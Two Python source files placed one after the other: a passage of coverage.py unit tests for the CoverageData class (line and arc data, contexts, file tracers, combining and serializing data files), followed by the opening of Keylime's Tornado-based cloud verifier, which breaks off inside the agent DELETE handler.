covdata.add_arcs({})
self.assertFalse(covdata)
def test_adding_lines(self):
covdata = CoverageData()
covdata.add_lines(LINES_1)
self.assert_lines1_data(covdata)
def test_adding_arcs(self):
covdata = CoverageData()
covdata.add_arcs(ARCS_3)
self.assert_arcs3_data(covdata)
def test_ok_to_add_lines_twice(self):
covdata = CoverageData()
covdata.add_lines(LINES_1)
covdata.add_lines(LINES_2)
self.assert_line_counts(covdata, SUMMARY_1_2)
self.assert_measured_files(covdata, MEASURED_FILES_1_2)
def test_ok_to_add_arcs_twice(self):
covdata = CoverageData()
covdata.add_arcs(ARCS_3)
covdata.add_arcs(ARCS_4)
self.assert_line_counts(covdata, SUMMARY_3_4)
self.assert_measured_files(covdata, MEASURED_FILES_3_4)
def test_cant_add_arcs_with_lines(self):
covdata = CoverageData()
covdata.add_lines(LINES_1)
with self.assertRaisesRegex(CoverageException, "Can't add arcs to existing line data"):
covdata.add_arcs(ARCS_3)
def test_cant_add_lines_with_arcs(self):
covdata = CoverageData()
covdata.add_arcs(ARCS_3)
with self.assertRaisesRegex(CoverageException, "Can't add lines to existing arc data"):
covdata.add_lines(LINES_1)
def test_touch_file_with_lines(self):
covdata = CoverageData()
covdata.add_lines(LINES_1)
covdata.touch_file('zzz.py')
self.assert_measured_files(covdata, MEASURED_FILES_1 + ['zzz.py'])
def test_touch_file_with_arcs(self):
covdata = CoverageData()
covdata.add_arcs(ARCS_3)
covdata.touch_file('zzz.py')
self.assert_measured_files(covdata, MEASURED_FILES_3 + ['zzz.py'])
def test_set_query_contexts(self):
covdata = CoverageData()
covdata.set_context('test_a')
covdata.add_lines(LINES_1)
covdata.set_query_contexts(['test_*'])
self.assertEqual(covdata.lines('a.py'), [1, 2])
covdata.set_query_contexts(['other*'])
self.assertEqual(covdata.lines('a.py'), [])
def test_no_lines_vs_unmeasured_file(self):
covdata = CoverageData()
covdata.add_lines(LINES_1)
covdata.touch_file('zzz.py')
self.assertEqual(covdata.lines('zzz.py'), [])
self.assertIsNone(covdata.lines('no_such_file.py'))
def test_lines_with_contexts(self):
covdata = CoverageData()
covdata.set_context('test_a')
covdata.add_lines(LINES_1)
self.assertEqual(covdata.lines('a.py'), [1, 2])
self.assertEqual(covdata.lines('a.py', contexts=['test*']), [1, 2])
self.assertEqual(covdata.lines('a.py', contexts=['other*']), [])
def test_contexts_by_lineno_with_lines(self):
covdata = CoverageData()
covdata.set_context('test_a')
covdata.add_lines(LINES_1)
self.assertDictEqual(
covdata.contexts_by_lineno('a.py'),
{1: ['test_a'], 2: ['test_a']})
def test_run_info(self):
self.skip_unless_data_storage_is("json")
covdata = CoverageData()
self.assertEqual(covdata.run_infos(), [])
covdata.add_run_info(hello="there")
self.assertEqual(covdata.run_infos(), [{"hello": "there"}])
covdata.add_run_info(count=17)
self.assertEqual(covdata.run_infos(), [{"hello": "there", "count": 17}])
def test_no_duplicate_lines(self):
covdata = CoverageData()
covdata.set_context("context1")
covdata.add_lines(LINES_1)
covdata.set_context("context2")
covdata.add_lines(LINES_1)
self.assertEqual(covdata.lines('a.py'), A_PY_LINES_1)
def test_no_duplicate_arcs(self):
covdata = CoverageData()
covdata.set_context("context1")
covdata.add_arcs(ARCS_3)
covdata.set_context("context2")
covdata.add_arcs(ARCS_3)
self.assertEqual(covdata.arcs('x.py'), X_PY_ARCS_3)
def test_no_arcs_vs_unmeasured_file(self):
covdata = CoverageData()
covdata.add_arcs(ARCS_3)
covdata.touch_file('zzz.py')
self.assertEqual(covdata.lines('zzz.py'), [])
self.assertIsNone(covdata.lines('no_such_file.py'))
self.assertEqual(covdata.arcs('zzz.py'), [])
self.assertIsNone(covdata.arcs('no_such_file.py'))
def test_arcs_with_contexts(self):
covdata = CoverageData()
covdata.set_context('test_x')
covdata.add_arcs(ARCS_3)
self.assertEqual(
covdata.arcs('x.py'), [(-1, 1), (1, 2), (2, 3), (3, -1)])
self.assertEqual(covdata.arcs(
'x.py', contexts=['test*']), [(-1, 1), (1, 2), (2, 3), (3, -1)])
self.assertEqual(covdata.arcs('x.py', contexts=['other*']), [])
def test_contexts_by_lineno_with_arcs(self):
covdata = CoverageData()
covdata.set_context('test_x')
covdata.add_arcs(ARCS_3)
self.assertDictEqual(
covdata.contexts_by_lineno('x.py'),
{-1: ['test_x'], 1: ['test_x'], 2: ['test_x'], 3: ['test_x']})
def test_contexts_by_lineno_with_unknown_file(self):
covdata = CoverageData()
self.assertDictEqual(
covdata.contexts_by_lineno('xyz.py'), {})
def test_file_tracer_name(self):
covdata = CoverageData()
covdata.add_lines({
"p1.foo": dict.fromkeys([1, 2, 3]),
"p2.html": dict.fromkeys([10, 11, 12]),
"main.py": dict.fromkeys([20]),
})
covdata.add_file_tracers({"p1.foo": "p1.plugin", "p2.html": "p2.plugin"})
self.assertEqual(covdata.file_tracer("p1.foo"), "p1.plugin")
self.assertEqual(covdata.file_tracer("main.py"), "")
self.assertIsNone(covdata.file_tracer("p3.not_here"))
def test_cant_file_tracer_unmeasured_files(self):
covdata = CoverageData()
msg = "Can't add file tracer data for unmeasured file 'p1.foo'"
with self.assertRaisesRegex(CoverageException, msg):
covdata.add_file_tracers({"p1.foo": "p1.plugin"})
covdata.add_lines({"p2.html": dict.fromkeys([10, 11, 12])})
with self.assertRaisesRegex(CoverageException, msg):
covdata.add_file_tracers({"p1.foo": "p1.plugin"})
def test_cant_change_file_tracer_name(self):
covdata = CoverageData()
covdata.add_lines({"p1.foo": dict.fromkeys([1, 2, 3])})
covdata.add_file_tracers({"p1.foo": "p1.plugin"})
msg = "Conflicting file tracer name for 'p1.foo': u?'p1.plugin' vs u?'p1.plugin.foo'"
with self.assertRaisesRegex(CoverageException, msg):
covdata.add_file_tracers({"p1.foo": "p1.plugin.foo"})
def test_update_lines(self):
covdata1 = CoverageData(suffix='1')
covdata1.add_lines(LINES_1)
covdata2 = CoverageData(suffix='2')
covdata2.add_lines(LINES_2)
covdata3 = CoverageData(suffix='3')
covdata3.update(covdata1)
covdata3.update(covdata2)
self.assert_line_counts(covdata3, SUMMARY_1_2)
self.assert_measured_files(covdata3, MEASURED_FILES_1_2)
self.assertEqual(covdata3.run_infos(), [])
def test_update_arcs(self):
covdata1 = CoverageData(suffix='1')
covdata1.add_arcs(ARCS_3)
covdata2 = CoverageData(suffix='2')
covdata2.add_arcs(ARCS_4)
covdata3 = CoverageData(suffix='3')
covdata3.update(covdata1)
covdata3.update(covdata2)
self.assert_line_counts(covdata3, SUMMARY_3_4)
self.assert_measured_files(covdata3, MEASURED_FILES_3_4)
self.assertEqual(covdata3.run_infos(), [])
def test_update_run_info(self):
self.skip_unless_data_storage_is("json")
covdata1 = CoverageData()
covdata1.add_arcs(ARCS_3)
covdata1.add_run_info(hello="there", count=17)
covdata2 = CoverageData()
covdata2.add_arcs(ARCS_4)
covdata2.add_run_info(hello="goodbye", count=23)
covdata3 = CoverageData()
covdata3.update(covdata1)
covdata3.update(covdata2)
self.assertEqual(covdata3.run_infos(), [
{'hello': 'there', 'count': 17},
{'hello': 'goodbye', 'count': 23},
])
def test_update_cant_mix_lines_and_arcs(self):
covdata1 = CoverageData(suffix='1')
covdata1.add_lines(LINES_1)
covdata2 = CoverageData(suffix='2')
covdata2.add_arcs(ARCS_3)
with self.assertRaisesRegex(CoverageException, "Can't combine arc data with line data"):
covdata1.update(covdata2)
with self.assertRaisesRegex(CoverageException, "Can't combine line data with arc data"):
covdata2.update(covdata1)
def test_update_file_tracers(self):
covdata1 = CoverageData(suffix='1')
covdata1.add_lines({
"p1.html": dict.fromkeys([1, 2, 3, 4]),
"p2.html": dict.fromkeys([5, 6, 7]),
"main.py": dict.fromkeys([10, 11, 12]),
})
covdata1.add_file_tracers({
"p1.html": "html.plugin",
"p2.html": "html.plugin2",
})
covdata2 = CoverageData(suffix='2')
covdata2.add_lines({
"p1.html": dict.fromkeys([3, 4, 5, 6]),
"p2.html": dict.fromkeys([7, 8, 9]),
"p3.foo": dict.fromkeys([1000, 1001]),
"main.py": dict.fromkeys([10, 11, 12]),
})
covdata2.add_file_tracers({
"p1.html": "html.plugin",
"p2.html": "html.plugin2",
"p3.foo": "foo_plugin",
})
covdata3 = CoverageData(suffix='3')
covdata3.update(covdata1)
covdata3.update(covdata2)
self.assertEqual(covdata3.file_tracer("p1.html"), "html.plugin")
self.assertEqual(covdata3.file_tracer("p2.html"), "html.plugin2")
self.assertEqual(covdata3.file_tracer("p3.foo"), "foo_plugin")
self.assertEqual(covdata3.file_tracer("main.py"), "")
def test_update_conflicting_file_tracers(self):
covdata1 = CoverageData(suffix='1')
covdata1.add_lines({"p1.html": dict.fromkeys([1, 2, 3])})
covdata1.add_file_tracers({"p1.html": "html.plugin"})
covdata2 = CoverageData(suffix='2')
covdata2.add_lines({"p1.html": dict.fromkeys([1, 2, 3])})
covdata2.add_file_tracers({"p1.html": "html.other_plugin"})
msg = "Conflicting file tracer name for 'p1.html': u?'html.plugin' vs u?'html.other_plugin'"
with self.assertRaisesRegex(CoverageException, msg):
covdata1.update(covdata2)
msg = "Conflicting file tracer name for 'p1.html': u?'html.other_plugin' vs u?'html.plugin'"
with self.assertRaisesRegex(CoverageException, msg):
covdata2.update(covdata1)
def test_update_file_tracer_vs_no_file_tracer(self):
covdata1 = CoverageData(suffix="1")
covdata1.add_lines({"p1.html": dict.fromkeys([1, 2, 3])})
covdata1.add_file_tracers({"p1.html": "html.plugin"})
covdata2 = CoverageData(suffix="2")
covdata2.add_lines({"p1.html": dict.fromkeys([1, 2, 3])})
msg = "Conflicting file tracer name for 'p1.html': u?'html.plugin' vs u?''"
with self.assertRaisesRegex(CoverageException, msg):
covdata1.update(covdata2)
msg = "Conflicting file tracer name for 'p1.html': u?'' vs u?'html.plugin'"
with self.assertRaisesRegex(CoverageException, msg):
covdata2.update(covdata1)
def test_asking_isnt_measuring(self):
# Asking about an unmeasured file shouldn't make it seem measured.
covdata = CoverageData()
self.assert_measured_files(covdata, [])
self.assertEqual(covdata.arcs("missing.py"), None)
self.assert_measured_files(covdata, [])
def test_add_to_hash_with_lines(self):
covdata = CoverageData()
covdata.add_lines(LINES_1)
hasher = mock.Mock()
add_data_to_hash(covdata, "a.py", hasher)
self.assertEqual(hasher.method_calls, [
mock.call.update([1, 2]), # lines
mock.call.update(""), # file_tracer name
])
def test_add_to_hash_with_arcs(self):
covdata = CoverageData()
covdata.add_arcs(ARCS_3)
covdata.add_file_tracers({"y.py": "hologram_plugin"})
hasher = mock.Mock()
add_data_to_hash(covdata, "y.py", hasher)
self.assertEqual(hasher.method_calls, [
mock.call.update([(-1, 17), (17, 23), (23, -1)]), # arcs
mock.call.update("hologram_plugin"), # file_tracer name
])
def test_add_to_lines_hash_with_missing_file(self):
# https://bitbucket.org/ned/coveragepy/issues/403
covdata = CoverageData()
covdata.add_lines(LINES_1)
hasher = mock.Mock()
add_data_to_hash(covdata, "missing.py", hasher)
self.assertEqual(hasher.method_calls, [
mock.call.update([]),
mock.call.update(None),
])
def test_add_to_arcs_hash_with_missing_file(self):
# https://bitbucket.org/ned/coveragepy/issues/403
covdata = CoverageData()
covdata.add_arcs(ARCS_3)
covdata.add_file_tracers({"y.py": "hologram_plugin"})
hasher = mock.Mock()
add_data_to_hash(covdata, "missing.py", hasher)
self.assertEqual(hasher.method_calls, [
mock.call.update([]),
mock.call.update(None),
])
def test_empty_lines_are_still_lines(self):
covdata = CoverageData()
covdata.add_lines({})
covdata.touch_file("abc.py")
self.assertFalse(covdata.has_arcs())
def test_empty_arcs_are_still_arcs(self):
covdata = CoverageData()
covdata.add_arcs({})
covdata.touch_file("abc.py")
self.assertTrue(covdata.has_arcs())
def test_read_and_write_are_opposites(self):
covdata1 = CoverageData()
covdata1.add_arcs(ARCS_3)
covdata1.write()
covdata2 = CoverageData()
covdata2.read()
self.assert_arcs3_data(covdata2)
def test_thread_stress(self):
covdata = CoverageData()
def thread_main():
"""Every thread will try to add the same data."""
covdata.add_lines(LINES_1)
threads = [threading.Thread(target=thread_main) for _ in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assert_lines1_data(covdata)
class CoverageDataTestInTempDir(DataTestHelpers, CoverageTest):
"""Tests of CoverageData that need a temporary directory to make files."""
def test_read_write_lines(self):
covdata1 = CoverageData("lines.dat")
covdata1.add_lines(LINES_1)
covdata1.write()
covdata2 = CoverageData("lines.dat")
covdata2.read()
self.assert_lines1_data(covdata2)
def test_read_write_arcs(self):
covdata1 = CoverageData("arcs.dat")
covdata1.add_arcs(ARCS_3)
covdata1.write()
covdata2 = CoverageData("arcs.dat")
covdata2.read()
self.assert_arcs3_data(covdata2)
def test_read_errors(self):
msg = r"Couldn't .* '.*[/\\]{0}': \S+"
self.make_file("xyzzy.dat", "xyzzy")
with self.assertRaisesRegex(CoverageException, msg.format("xyzzy.dat")):
covdata = CoverageData("xyzzy.dat")
covdata.read()
self.assertFalse(covdata)
self.make_file("empty.dat", "")
with self.assertRaisesRegex(CoverageException, msg.format("empty.dat")):
covdata = CoverageData("empty.dat")
covdata.read()
self.assertFalse(covdata)
def test_read_sql_errors(self):
with sqlite3.connect("wrong_schema.db") as con:
con.execute("create table coverage_schema (version integer)")
con.execute("insert into coverage_schema (version) values (99)")
msg = r"Couldn't .* '.*[/\\]{}': wrong schema: 99 instead of \d+".format("wrong_schema.db")
with self.assertRaisesRegex(CoverageException, msg):
covdata = CoverageData("wrong_schema.db")
covdata.read()
self.assertFalse(covdata)
with sqlite3.connect("no_schema.db") as con:
con.execute("create table foobar (baz text)")
msg = r"Couldn't .* '.*[/\\]{}': \S+".format("no_schema.db")
with self.assertRaisesRegex(CoverageException, msg):
covdata = CoverageData("no_schema.db")
covdata.read()
self.assertFalse(covdata)
class CoverageDataFilesTest(DataTestHelpers, CoverageTest):
"""Tests of CoverageData file handling."""
no_files_in_temp_dir = True
def test_reading_missing(self):
self.assert_doesnt_exist(".coverage")
covdata = CoverageData()
covdata.read()
self.assert_line_counts(covdata, {})
def test_writing_and_reading(self):
covdata1 = CoverageData()
covdata1.add_lines(LINES_1)
covdata1.write()
covdata2 = CoverageData()
covdata2.read()
self.assert_line_counts(covdata2, SUMMARY_1)
def test_debug_output_with_debug_option(self):
# With debug option dataio, we get debug output about reading and
# writing files.
debug = DebugControlString(options=["dataio"])
covdata1 = CoverageData(debug=debug)
covdata1.add_lines(LINES_1)
covdata1.write()
covdata2 = CoverageData(debug=debug)
covdata2.read()
self.assert_line_counts(covdata2, SUMMARY_1)
self.assertRegex(
debug.get_output(),
r"^Erasing data file '.*\.coverage'\n"
r"Creating data file '.*\.coverage'\n"
r"Opening data file '.*\.coverage'\n$"
)
def test_debug_output_without_debug_option(self):
# With a debug object, but not the dataio option, we don't get debug
# output.
debug = DebugControlString(options=[])
covdata1 = CoverageData(debug=debug)
covdata1.add_lines(LINES_1)
covdata1.write()
covdata2 = CoverageData(debug=debug)
covdata2.read()
self.assert_line_counts(covdata2, SUMMARY_1)
self.assertEqual(debug.get_output(), "")
def test_explicit_suffix(self):
self.assert_doesnt_exist(".coverage.SUFFIX")
covdata = CoverageData(suffix='SUFFIX')
covdata.add_lines(LINES_1)
covdata.write()
self.assert_exists(".coverage.SUFFIX")
self.assert_doesnt_exist(".coverage")
def test_true_suffix(self):
self.assert_file_count(".coverage.*", 0)
# suffix=True will make a randomly named data file.
covdata1 = CoverageData(suffix=True)
covdata1.add_lines(LINES_1)
covdata1.write()
self.assert_doesnt_exist(".coverage")
data_files1 = glob.glob(".coverage.*")
self.assertEqual(len(data_files1), 1)
# Another suffix=True will choose a different name.
covdata2 = CoverageData(suffix=True)
covdata2.add_lines(LINES_1)
covdata2.write()
self.assert_doesnt_exist(".coverage")
data_files2 = glob.glob(".coverage.*")
self.assertEqual(len(data_files2), 2)
# In addition to being different, the suffixes have the pid in them.
self.assertTrue(all(str(os.getpid()) in fn for fn in data_files2))
def test_combining(self):
self.assert_file_count(".coverage.*", 0)
covdata1 = CoverageData(suffix='1')
covdata1.add_lines(LINES_1)
covdata1.write()
self.assert_exists(".coverage.1")
self.assert_file_count(".coverage.*", 1)
covdata2 = CoverageData(suffix='2')
covdata2.add_lines(LINES_2)
covdata2.write()
self.assert_exists(".coverage.2")
self.assert_file_count(".coverage.*", 2)
covdata3 = CoverageData()
combine_parallel_data(covdata3)
self.assert_line_counts(covdata3, SUMMARY_1_2)
self.assert_measured_files(covdata3, MEASURED_FILES_1_2)
self.assert_file_count(".coverage.*", 0)
def test_erasing(self):
covdata1 = CoverageData()
covdata1.add_lines(LINES_1)
covdata1.write()
covdata1.erase()
self.assert_line_counts(covdata1, {})
covdata2 = CoverageData()
covdata2.read()
self.assert_line_counts(covdata2, {})
def test_erasing_parallel(self):
self.make_file("datafile.1")
self.make_file("datafile.2")
self.make_file(".coverage")
data = CoverageData("datafile")
data.erase(parallel=True)
self.assert_file_count("datafile.*", 0)
self.assert_exists(".coverage")
def test_combining_with_aliases(self):
covdata1 = CoverageData(suffix='1')
covdata1.add_lines({
'/home/ned/proj/src/a.py': {1: None, 2: None},
'/home/ned/proj/src/sub/b.py': {3: None},
'/home/ned/proj/src/template.html': {10: None},
})
covdata1.add_file_tracers({
'/home/ned/proj/src/template.html': 'html.plugin',
})
covdata1.write()
covdata2 = CoverageData(suffix='2')
covdata2.add_lines({
r'c:\ned\test\a.py': {4: None, 5: None},
r'c:\ned\test\sub\b.py': {3: None, 6: None},
})
covdata2.write()
self.assert_file_count(".coverage.*", 2)
covdata3 = CoverageData()
aliases = PathAliases()
aliases.add("/home/ned/proj/src/", "./")
aliases.add(r"c:\ned\test", "./")
combine_parallel_data(covdata3, aliases=aliases)
self.assert_file_count(".coverage.*", 0)
# covdata3 hasn't been written yet. Should this file exist or not?
#self.assert_exists(".coverage")
apy = canonical_filename('./a.py')
sub_bpy = canonical_filename('./sub/b.py')
template_html = canonical_filename('./template.html')
self.assert_line_counts(covdata3, {apy: 4, sub_bpy: 2, template_html: 1}, fullpath=True)
self.assert_measured_files(covdata3, [apy, sub_bpy, template_html])
self.assertEqual(covdata3.file_tracer(template_html), 'html.plugin')
def test_combining_from_different_directories(self):
os.makedirs('cov1')
covdata1 = CoverageData('cov1/.coverage.1')
covdata1.add_lines(LINES_1)
covdata1.write()
os.makedirs('cov2')
covdata2 = CoverageData('cov2/.coverage.2')
covdata2.add_lines(LINES_2)
covdata2.write()
# This data won't be included.
covdata_xxx = CoverageData('.coverage.xxx')
covdata_xxx.add_arcs(ARCS_3)
covdata_xxx.write()
covdata3 = CoverageData()
combine_parallel_data(covdata3, data_paths=['cov1', 'cov2'])
self.assert_line_counts(covdata3, SUMMARY_1_2)
self.assert_measured_files(covdata3, MEASURED_FILES_1_2)
self.assert_doesnt_exist("cov1/.coverage.1")
self.assert_doesnt_exist("cov2/.coverage.2")
self.assert_exists(".coverage.xxx")
def test_combining_from_files(self):
os.makedirs('cov1')
covdata1 = CoverageData('cov1/.coverage.1')
covdata1.add_lines(LINES_1)
covdata1.write()
os.makedirs('cov2')
covdata2 = CoverageData('cov2/.coverage.2')
covdata2.add_lines(LINES_2)
covdata2.write()
# This data won't be included.
covdata_xxx = CoverageData('.coverage.xxx')
covdata_xxx.add_arcs(ARCS_3)
covdata_xxx.write()
covdata_2xxx = CoverageData('cov2/.coverage.xxx')
covdata_2xxx.add_arcs(ARCS_3)
covdata_2xxx.write()
covdata3 = CoverageData()
combine_parallel_data(covdata3, data_paths=['cov1', 'cov2/.coverage.2'])
self.assert_line_counts(covdata3, SUMMARY_1_2)
self.assert_measured_files(covdata3, MEASURED_FILES_1_2)
self.assert_doesnt_exist("cov1/.coverage.1")
self.assert_doesnt_exist("cov2/.coverage.2")
self.assert_exists(".coverage.xxx")
self.assert_exists("cov2/.coverage.xxx")
def test_combining_from_nonexistent_directories(self):
covdata = CoverageData()
msg = "Couldn't combine from non-existent path 'xyzzy'"
with self.assertRaisesRegex(CoverageException, msg):
combine_parallel_data(covdata, data_paths=['xyzzy'])
def test_interleaved_erasing_bug716(self):
# pytest-cov could produce this scenario. #716
covdata1 = CoverageData()
covdata2 = CoverageData()
# this used to create the .coverage database file..
covdata2.set_context("")
# then this would erase it all..
covdata1.erase()
# then this would try to use tables that no longer exist.
# "no such table: meta"
covdata2.add_lines(LINES_1)
class DumpsLoadsTest(DataTestHelpers, CoverageTest):
"""Tests of CoverageData.dumps and loads."""
run_in_temp_dir = False
def test_serialization(self):
covdata1 = CoverageData(no_disk=True)
covdata1.add_lines(LINES_1)
covdata1.add_lines(LINES_2)
serial = covdata1.dumps()
covdata2 = CoverageData(no_disk=True)
covdata2.loads(serial)
self.assert_line_counts(covdata2, SUMMARY_1_2)
self.assert_measured_files(covdata2, MEASURED_FILES_1_2)
def test_misfed_serialization(self):
covdata = CoverageData(no_disk=True)
bad_data = b'Hello, world!\x07 ' + b'z' * 100
msg = r"Unrecognized serialization: {} \(head of {} bytes\)".format(
re.escape(repr(bad_data[:40])),
len(bad_data),
)
with self.assertRaisesRegex(CoverageException, msg):
covdata.loads(bad_data)
|
cloud_verifier_tornado.py
|
#!/usr/bin/python3
"""
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
"""
import asyncio
import functools
import os
import signal
import sys
import traceback
from multiprocessing import Process
import tornado.ioloop
import tornado.web
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy.orm.exc import NoResultFound
from keylime import api_version as keylime_api_version
from keylime import (
cloud_verifier_common,
config,
json,
keylime_logging,
revocation_notifier,
tornado_requests,
web_util,
)
from keylime.agentstates import AgentAttestStates
from keylime.common import retry, states, validators
from keylime.db.keylime_db import DBEngineManager, SessionManager
from keylime.db.verifier_db import VerfierMain, VerifierAllowlist
from keylime.elchecking import policies
from keylime.failure import MAX_SEVERITY_LABEL, Component, Failure
logger = keylime_logging.init_logging("cloudverifier")
try:
engine = DBEngineManager().make_engine("cloud_verifier")
except SQLAlchemyError as err:
logger.error("Error creating SQL engine or session: %s", err)
sys.exit(1)
def get_session():
return SessionManager().make_session(engine)
def get_AgentAttestStates():
return AgentAttestStates.get_instance()
# The "exclude_db" dict values are removed from the response before adding the dict to the DB
# This is because we want these values to remain ephemeral and not stored in the database.
exclude_db = {
"registrar_data": "",
"nonce": "",
"b64_encrypted_V": "",
"provide_V": True,
"num_retries": 0,
"pending_event": None,
"first_verified": False,
# the following items are updated in the VerifierDB only when the AgentState is stored
"boottime": "",
"ima_pcrs": [],
"pcr10": "",
"next_ima_ml_entry": 0,
"learned_ima_keyrings": {},
"ssl_context": None,
}
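# exclude_db is used in two places below: _from_db_obj() merges these defaults back into
# the in-memory agent dict, and process_agent() strips the same keys from the dict before
# writing it back to the verifier database.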
def _from_db_obj(agent_db_obj):
fields = [
"agent_id",
"v",
"ip",
"port",
"operational_state",
"public_key",
"tpm_policy",
"meta_data",
"mb_refstate",
"allowlist",
"ima_sign_verification_keys",
"revocation_key",
"accept_tpm_hash_algs",
"accept_tpm_encryption_algs",
"accept_tpm_signing_algs",
"hash_alg",
"enc_alg",
"sign_alg",
"boottime",
"ima_pcrs",
"pcr10",
"next_ima_ml_entry",
"learned_ima_keyrings",
"supported_version",
"mtls_cert",
"ak_tpm",
]
agent_dict = {}
for field in fields:
agent_dict[field] = getattr(agent_db_obj, field, None)
# add default fields that are ephemeral
for key, val in exclude_db.items():
agent_dict[key] = val
return agent_dict
def verifier_db_delete_agent(session, agent_id):
get_AgentAttestStates().delete_by_agent_id(agent_id)
session.query(VerfierMain).filter_by(agent_id=agent_id).delete()
session.commit()
def store_attestation_state(agentAttestState):
# Only store if IMA log was evaluated
if agentAttestState.get_ima_pcrs():
session = get_session()
try:
update_agent = session.query(VerfierMain).get(agentAttestState.get_agent_id())
update_agent.boottime = agentAttestState.get_boottime()
update_agent.next_ima_ml_entry = agentAttestState.get_next_ima_ml_entry()
ima_pcrs_dict = agentAttestState.get_ima_pcrs()
update_agent.ima_pcrs = list(ima_pcrs_dict.keys())
for pcr_num, value in ima_pcrs_dict.items():
setattr(update_agent, f"pcr{pcr_num}", value)
update_agent.learned_ima_keyrings = agentAttestState.get_ima_keyrings().to_json()
try:
session.add(update_agent)
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error on storing attestation state: %s", e)
session.commit()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error on storing attestation state: %s", e)
class BaseHandler(tornado.web.RequestHandler):
def prepare(self): # pylint: disable=W0235
super().prepare()
def write_error(self, status_code, **kwargs):
self.set_header("Content-Type", "text/json")
if self.settings.get("serve_traceback") and "exc_info" in kwargs:
# in debug mode, try to send a traceback
lines = []
for line in traceback.format_exception(*kwargs["exc_info"]):
lines.append(line)
self.finish(
json.dumps(
{
"code": status_code,
"status": self._reason,
"traceback": lines,
"results": {},
}
)
)
else:
self.finish(
json.dumps(
{
"code": status_code,
"status": self._reason,
"results": {},
}
)
)
def data_received(self, chunk):
raise NotImplementedError()
class MainHandler(tornado.web.RequestHandler):
def head(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface instead")
def get(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface instead")
def delete(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface instead")
def post(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface instead")
def put(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface instead")
def data_received(self, chunk):
raise NotImplementedError()
class VersionHandler(BaseHandler):
def head(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use GET interface instead")
def get(self):
rest_params = web_util.get_restful_params(self.request.uri)
if rest_params is None:
web_util.echo_json_response(self, 405, "Not Implemented")
return
if "version" not in rest_params:
web_util.echo_json_response(self, 400, "URI not supported")
logger.warning("GET returning 400 response. URI not supported: %s", self.request.path)
return
version_info = {
"current_version": keylime_api_version.current_version(),
"supported_versions": keylime_api_version.all_versions(),
}
web_util.echo_json_response(self, 200, "Success", version_info)
def delete(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use GET interface instead")
def post(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use GET interface instead")
def put(self):
web_util.echo_json_response(self, 405, "Not Implemented: Use GET interface instead")
def data_received(self, chunk):
raise NotImplementedError()
class AgentsHandler(BaseHandler):
mtls_options = None # Stores the cert, key and password used by the verifier for mTLS connections
def initialize(self, mtls_options):
self.mtls_options = mtls_options
def head(self):
"""HEAD not supported"""
web_util.echo_json_response(self, 405, "HEAD not supported")
def get(self):
"""This method handles the GET requests to retrieve status on agents from the Cloud Verifier.
Currently, only agents resources are available for GETing, i.e. /agents. All other GET uri's
will return errors. Agents requests require a single agent_id parameter which identifies the
agent to be returned. If the agent_id is not found, a 404 response is returned. If the agent_id
was not found, it either completed successfully, or failed. If found, the agent_id is still polling
to contact the Cloud Agent.
"""
session = get_session()
rest_params = web_util.get_restful_params(self.request.uri)
if rest_params is None:
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface")
return
if not web_util.validate_api_version(self, rest_params["api_version"], logger):
return
if "agents" not in rest_params:
web_util.echo_json_response(self, 400, "uri not supported")
logger.warning("GET returning 400 response. uri not supported: %s", self.request.path)
return
agent_id = rest_params["agents"]
if (agent_id is not None) and (agent_id != ""):
# If the agent ID is not valid (wrong set of characters),
# just do nothing.
if not validators.valid_agent_id(agent_id):
web_util.echo_json_response(self, 400, "agent_id not not valid")
logger.error("GET received an invalid agent ID: %s", agent_id)
return
try:
agent = session.query(VerfierMain).filter_by(agent_id=agent_id).one_or_none()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
agent = None
if agent is not None:
response = cloud_verifier_common.process_get_status(agent)
web_util.echo_json_response(self, 200, "Success", response)
else:
web_util.echo_json_response(self, 404, "agent id not found")
else:
json_response = None
if "bulk" in rest_params:
agent_list = None
if ("verifier" in rest_params) and (rest_params["verifier"] != ""):
agent_list = session.query(VerfierMain).filter_by(verifier_id=rest_params["verifier"]).all()
else:
agent_list = session.query(VerfierMain).all()
json_response = {}
for agent in agent_list:
json_response[agent.agent_id] = cloud_verifier_common.process_get_status(agent)
web_util.echo_json_response(self, 200, "Success", json_response)
else:
if ("verifier" in rest_params) and (rest_params["verifier"] != ""):
json_response = (
session.query(VerfierMain.agent_id).filter_by(verifier_id=rest_params["verifier"]).all()
)
else:
json_response = session.query(VerfierMain.agent_id).all()
web_util.echo_json_response(self, 200, "Success", {"uuids": json_response})
logger.info("GET returning 200 response for agent_id list")
def delete(self):
"""This method handles the DELETE requests to remove agents from the Cloud Verifier.
Currently, only agents resources are available for DELETEing, i.e. /agents. All other DELETE uri's will return errors.
agents requests require a single agent_id parameter which identifies the agent to be deleted.
"""
session = get_session()
rest_params = web_util.get_restful_params(self.request.uri)
if rest_params is None:
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface")
return
if not web_util.validate_api_version(self, rest_params["api_version"], logger):
return
if "agents" not in rest_params:
web_util.echo_json_response(self, 400, "uri not supported")
return
agent_id = rest_params["agents"]
if agent_id is None:
web_util.echo_json_response(self, 400, "uri not supported")
logger.warning("DELETE returning 400 response. uri not supported: %s", self.request.path)
return
# If the agent ID is not valid (wrong set of characters), just
# do nothing.
if not validators.valid_agent_id(agent_id):
web_util.echo_json_response(self, 400, "agent_id not not valid")
logger.error("DELETE received an invalid agent ID: %s", agent_id)
return
try:
agent = session.query(VerfierMain).filter_by(agent_id=agent_id).first()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
agent = None
if agent is None:
web_util.echo_json_response(self, 404, "agent id not found")
logger.info("DELETE returning 404 response. agent id: %s not found.", agent_id)
return
verifier_id = config.get(
"cloud_verifier", "cloudverifier_id", fallback=cloud_verifier_common.DEFAULT_VERIFIER_ID
)
